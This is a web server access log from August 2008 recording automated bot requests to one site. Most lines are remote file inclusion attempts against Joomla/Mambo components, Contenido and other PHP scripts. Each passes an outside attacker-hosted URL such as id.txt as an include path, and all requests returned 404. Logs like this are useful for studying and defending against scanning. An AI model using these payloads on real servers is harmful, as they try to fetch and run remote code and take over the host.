74.53.243.226 - - [27/Aug/2008:03:54:25 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:03:54:59 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://triangle-uiuc.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.danjtams.com"
61.56.146.2 - - [27/Aug/2008:03:56:22 -0700] "GET /logs/access.log//index.php?option=com_simpleboard&task=&Itemid=&mosConfig_absolute_path=http://apai.yourfreehosting.net/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
61.56.146.2 - - [27/Aug/2008:03:56:24 -0700] "GET //index.php?option=com_simpleboard&task=&Itemid=&mosConfig_absolute_path=http://apai.yourfreehosting.net/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
61.56.146.2 - - [27/Aug/2008:03:56:27 -0700] "GET /logs//index.php?option=com_simpleboard&task=&Itemid=&mosConfig_absolute_path=http://apai.yourfreehosting.net/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:03:57:04 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:03:57:05 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:03:57:14 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:03:58:51 -0700] "GET /logs/access.log/errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:03:58:54 -0700] "GET /errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:03:58:58 -0700] "GET /logs/errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
200.68.51.152 - - [27/Aug/2008:04:01:20 -0700] "GET /logs/access.log//atom.php5?page=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.danjtams.com"
200.68.51.152 - - [27/Aug/2008:04:01:20 -0700] "GET //atom.php5?page=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.danjtams.com"
200.68.51.152 - - [27/Aug/2008:04:01:20 -0700] "GET /logs//atom.php5?page=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.danjtams.com"
74.53.243.226 - - [27/Aug/2008:04:03:35 -0700] "GET /logs/access.log/skin/zero_vote/error.php?dir=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.danjtams.com"
74.53.243.226 - - [27/Aug/2008:04:03:35 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.danjtams.com"
74.53.243.226 - - [27/Aug/2008:04:03:35 -0700] "GET /skin/zero_vote/error.php?dir=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.danjtams.com"
62.87.154.41 - - [27/Aug/2008:04:04:44 -0700] "GET /logs/access.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idxx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
62.87.154.41 - - [27/Aug/2008:04:04:45 -0700] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idxx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
62.87.154.41 - - [27/Aug/2008:04:04:45 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idxx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
74.53.243.226 - - [27/Aug/2008:04:06:05 -0700] "GET /logs/access.log/modules/TotalCalendar/about.php?inc_dir=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.danjtams.com"
74.53.243.226 - - [27/Aug/2008:04:06:05 -0700] "GET /logs/modules/TotalCalendar/about.php?inc_dir=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.danjtams.com"
74.53.243.226 - - [27/Aug/2008:04:06:05 -0700] "GET /modules/TotalCalendar/about.php?inc_dir=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.danjtams.com"
201.17.129.24 - - [27/Aug/2008:04:07:46 -0700] "GET /logs/access.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://desterrr.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
201.17.129.24 - - [27/Aug/2008:04:07:53 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://desterrr.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com" 201.17.129.24 - - [27